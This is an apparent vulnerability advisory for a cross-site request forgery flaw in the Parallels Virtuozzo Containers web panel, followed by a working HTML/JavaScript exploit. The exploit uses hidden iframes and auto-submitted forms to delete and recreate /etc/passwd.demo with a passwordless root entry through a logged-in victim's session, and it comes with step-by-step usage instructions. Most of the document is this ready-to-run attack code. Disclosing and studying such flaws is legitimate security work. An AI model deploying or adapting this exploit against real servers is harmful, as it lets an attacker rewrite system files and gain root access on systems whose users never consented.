source: https://www.securityfocus.com/bid/28589/info

Parallels Virtuozzo Containers is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to perform certain file-management actions with the privileges of the user running the application. Successful exploits will compromise affected computers.

Virtuozzo Containers 3.0.0-25.4.swsoft and 4.0.0-365.6.swsoft are vulnerable; other versions are also affected.

<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by overwriting /etc/passwd.demo tested against Version 365.6.swsoft (build: 4.0.0-365.6.swsoft). It doesn't work with older version due to paths changes. perform the following steps to test it: 1. create a blank /etc/passwd.demo on target machine 2. in this file replace 127.0.0.1 with target vps address 3. open a web browser and log into virtuozzo web interface 4. open this file in a new browser window and click the "lets rock" button when the page is fully loaded 5. check /etc/passwd.demo in the target vps filesystemm --> <script language="JavaScript"> var ok=false; function letsgo(){ ok=true; document.getElementById('form0').submit(); } </script> <!-- this sets /etc as the current path--> <iframe style="width:1px;height:1px;visibility:hidden" name=ifr src="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/index?path=L2V0Yw==" ></iframe> <iframe id=ifr1 style="width:1px;height:1px;visibility:hidden" name=ifr1 onload="if(ok)document.getElementById('form1').submit();" ></iframe> <iframe id=ifr2 style="width:1px;height:1px;visibility:hidden" name=ifr2 > </iframe> <!-- delete /etc/passwd.demo --> <form id=form0 target=ifr1 method=post action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/list-control" > <input type=hidden name="file-name" value="passwd.demo"> <input type=hidden name=delete value=1> </form> <!-- create /etc/passwd.demo --> <form id=form1 target=ifr2 enctype="multipart/form-data" name="defaultForm" method="POST" action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/create-file"> <input xmlns:http="http://www.swsoft.com/xsl/cp/http" type="hidden" name="step" value="gen"> <input type=hidden name="file_name" value="passwd.demo"> <input type=hidden name="file_body" value="root::0:0::/root:/bin/bash"> <input type=hidden name="next" value="Create"> </form> <input type=button value="lets rock" onclick="letsgo()">